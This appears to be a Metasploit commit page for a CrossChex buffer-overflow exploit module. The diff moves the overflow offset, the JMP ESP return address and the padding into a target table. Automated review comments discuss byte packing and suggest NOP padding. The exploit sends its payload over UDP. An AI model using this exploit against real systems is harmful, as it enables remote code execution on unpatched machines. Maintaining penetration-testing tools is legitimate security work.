Land #12902, Add exploit module for crosschex buffer overflow

dwelch-r7 committed Feb 13, 2020
2 parents 0e55e20 + 2ca2b5c commit 07954c0ce214d4ba505a0ff514d6b3f7f2e9e865
Showing with 8 additions and 4 deletions.
  1. +8 −4 modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -44,7 +44,11 @@ def initialize(info = {})
[
[
'Crosschex Standard x86 <= V4.3.12',
{}
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
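Review bot: 'Ret' in the new target hash is a pre-packed little-endian byte string ("\x07\x18\x42\x00") rather than an integer address, which breaks with the usual Metasploit convention of `'Ret' => 0x00421807` consumed via `[target.ret].pack('V')`; the integer form is easier to read against a disassembly and lets `check`/documentation cite the address directly. While touching this, the inline comments should record that the last byte of the return address is a NUL and that the overflow still lands bytes after it (the second hunk appends a 4-byte shift and the payload after `target.ret`), i.e. the copy is length-based rather than a C-string copy; a reader of the target table otherwise has to reverse the module to know why a NUL in the middle of the buffer is acceptable. The 'Offset' comment ("Overwrites memory to allow EIP to be overwritten") would also be more useful as "bytes from start of buffer to the saved return address".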
@@ -67,9 +71,9 @@ def exploit
end

print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(261)
sploit << "\x07\x18\x42\x00" # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(4) # Positions payload to be written at beginning of ESP
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded

udp_sock.sendto(sploit, host, port)
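Review bot: the 4 bytes of `rand_text_english(target['Shift'])` placed between `target.ret` and `payload.encoded` need a justification in the comment, because with a plain `ret` into a `JMP ESP` gadget ESP points at the dword immediately after the saved EIP, so those random letters would be the first bytes executed before the encoded payload; if the padding is there to compensate for a `ret 4`/stack adjustment in the vulnerable function, say so, and if it is really executed as code, it is safer to emit NOPs (`make_nops(target['Shift'])`) than random text. Since the target hash now documents 'Offset', 'Ret' and 'Shift', the duplicated trailing comments on `sploit << target.ret` and the shift line can be dropped here to avoid the two copies drifting apart.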
